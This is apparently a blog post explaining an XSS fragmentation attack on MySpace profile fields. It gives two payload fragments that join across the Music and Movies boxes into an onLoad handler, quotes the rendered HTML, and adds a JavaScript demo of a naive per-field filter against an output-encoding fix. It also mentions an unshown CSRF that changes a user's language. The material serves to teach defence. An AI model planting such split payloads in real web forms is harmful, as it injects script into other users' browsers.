XSS Fragmentation and MySpace 0day
kuza55 wrote a very good article on implementing fragmentation attacks with XSS.
At the simplest level, a fragmentation attack is possible when several fragments, each harmless on its own and therefore allowed through a filter or firewall, are recombined at their destination into something dangerous.
The actual exploit is to put <body foo=' in the "Music" box of your profile interests. Everything the page emits between the Music and Movies sections is then swallowed into the foo attribute value. In the Movies box you put ' onLoad='alert("xss");'> which closes the attribute, adds the event handler and finally closes the tag. The result looks like this (the capture below uses test as the attribute name and a different alert string, but the structure is the same):
<tr id=MusicRow><td valign="top" align="left" width="100" bgcolor="#b1d0f0"><span class="lightbluetext8">Music</span></td><td id="ProfileMusic" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">Music</span></td><td id='ProfileMusic' width='175' bgcolor='#d5e8fb' style="WORD-WRAP: break-word"><body test='</td></tr>
<script language="JavaScript">highlightInterests("ProfileMusic");</script>
<tr id=MoviesRow><td valign="top" align="left" width="100" bgcolor="#b1d0f0"><span class="lightbluetext8">Movies</span></td><td id="ProfileMovies" width="175" bgcolor="#d5e8fb" style="WORD-WRAP: break-word">' onLoad='alert("Salut?");'></body></html></td></tr>
<script language="JavaScript">highlightInterests("ProfileMovies");</script>
As you can see, there are no single quotes in the markup between the two interest fields, so the tag opened in the Music field stays open, the quote in the Movies field closes the attribute, and the event handler that follows it becomes part of that tag. This is a prime example of why you should not rely on contextual blacklisting, that is, inspecting each field on its own for complete HTML tags, proper formatting and so on. If I put a <style> tag in one field and use the javascript directive later in the page, in a different field but still inside that style block, it will run, whereas the same directive in the same field as the <style> tag gets blocked. Instead you should encode the characters that can change the parser's context (at minimum & < > " ') into their HTML entity equivalents on output, or more conservatively encode every non-alphanumeric character, so that user data can never open or close markup no matter how it is split across fields.
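To show the failure mode in working code, here is an added JavaScript example; it is not part of the original post and is not MySpace's code. It models a two-field profile template (constructed to mirror the layout captured above, reusing the ProfileMusic and ProfileMovies ids and the highlightInterests script call as plain template text), a naive per-field filter that only rejects complete tags and handlers, and the output-encoding fix. The tag scanner honours quoted attribute values the way a browser tokenizer does, which is exactly why an attribute opened in one field can swallow the template markup up to the next field:

```javascript
// Added example (not MySpace's code, not from the original post): why a
// per-field "complete tag" blacklist misses a split attribute, and why
// output encoding does not. The template below is constructed to mirror
// the two-field layout quoted above; the id values are taken from it.

// Minimal start-tag scanner that honours quoted attribute values, as a
// browser tokenizer does. A quoted value may contain '>' and other tags,
// so a tag opened in one field can extend into the next one.
function scanTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1) break;
    let j = lt + 1;
    if (html[j] === '/') {                          // end tag: skip to '>'
      const gt = html.indexOf('>', j);
      i = gt === -1 ? html.length : gt + 1;
      continue;
    }
    const nm = /^[a-zA-Z][a-zA-Z0-9]*/.exec(html.slice(j));
    if (!nm) { i = j; continue; }                   // stray '<', not a tag
    const name = nm[0].toLowerCase();
    j += name.length;
    const attrs = {};
    while (j < html.length && html[j] !== '>') {
      if (/[\s\/]/.test(html[j])) { j++; continue; }
      const an = /^[^\s=\/>]+/.exec(html.slice(j));
      if (!an) { j++; continue; }
      const aname = an[0].toLowerCase();
      j += aname.length;
      while (j < html.length && /\s/.test(html[j])) j++;
      let value = '';
      if (html[j] === '=') {
        j++;
        while (j < html.length && /\s/.test(html[j])) j++;
        const q = html[j];
        if (q === '"' || q === "'") {               // quoted: runs to the matching quote
          const end = html.indexOf(q, j + 1);
          value = html.slice(j + 1, end === -1 ? html.length : end);
          j = end === -1 ? html.length : end + 1;
        } else {                                    // unquoted: runs to whitespace or '>'
          value = /^[^\s>]*/.exec(html.slice(j))[0];
          j += value.length;
        }
      }
      attrs[aname] = value;
    }
    tags.push({ name, attrs });
    i = j + 1;
  }
  return tags;
}

// Every on* attribute on every start tag, i.e. the handlers a browser would wire up.
function findEventHandlers(html) {
  const found = [];
  for (const t of scanTags(html))
    for (const a of Object.keys(t.attrs))
      if (a.startsWith('on')) found.push({ tag: t.name, attr: a, value: t.attrs[a] });
  return found;
}

// The naive "contextual blacklist" the post warns against: judge each field in
// isolation and reject only complete dangerous constructs (script tags, handlers).
function naiveFieldFilter(field) {
  return scanTags(field).every(t => t.name !== 'script') &&
         findEventHandlers(field).length === 0;
}

// The fix: entity-encode the characters that can change parser context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Constructed two-field template; as in the capture, no single quotes sit between the fields.
function renderProfile(music, movies, enc) {
  return '<table>' +
    '<tr id="MusicRow"><td id="ProfileMusic" width="175">' + enc(music) + '</td></tr>' +
    '<script language="JavaScript">highlightInterests("ProfileMusic");</script>' +
    '<tr id="MoviesRow"><td id="ProfileMovies" width="175">' + enc(movies) + '</td></tr>' +
    '<script language="JavaScript">highlightInterests("ProfileMovies");</script>' +
    '</table>';
}

const MUSIC_FIELD = "<body foo='";                   // first fragment, as in the post
const MOVIES_FIELD = "' onLoad='alert(\"xss\");'>";  // second fragment, as in the post

// Returns what the naive filter decides and what handlers the rendered page
// ends up with, once without encoding and once with escapeHtml applied.
function demo() {
  const naiveAccepts = naiveFieldFilter(MUSIC_FIELD) && naiveFieldFilter(MOVIES_FIELD);
  const rawHandlers = findEventHandlers(renderProfile(MUSIC_FIELD, MOVIES_FIELD, s => s));
  const encodedHandlers = findEventHandlers(renderProfile(MUSIC_FIELD, MOVIES_FIELD, escapeHtml));
  return { naiveAccepts, rawHandlers, encodedHandlers };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the naive filter accepting both fragments, the unencoded page carrying a body tag with an onload handler whose foo attribute has eaten the whole Music-to-Movies stretch of the template, and the encoded page carrying no handler at all. The scanner is deliberately small and is only there to make the browser's view of the concatenated page visible; the defence is the encoder, not the scanner.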
Live code. It uses Malucs' CSRF that changes your preferred language to French.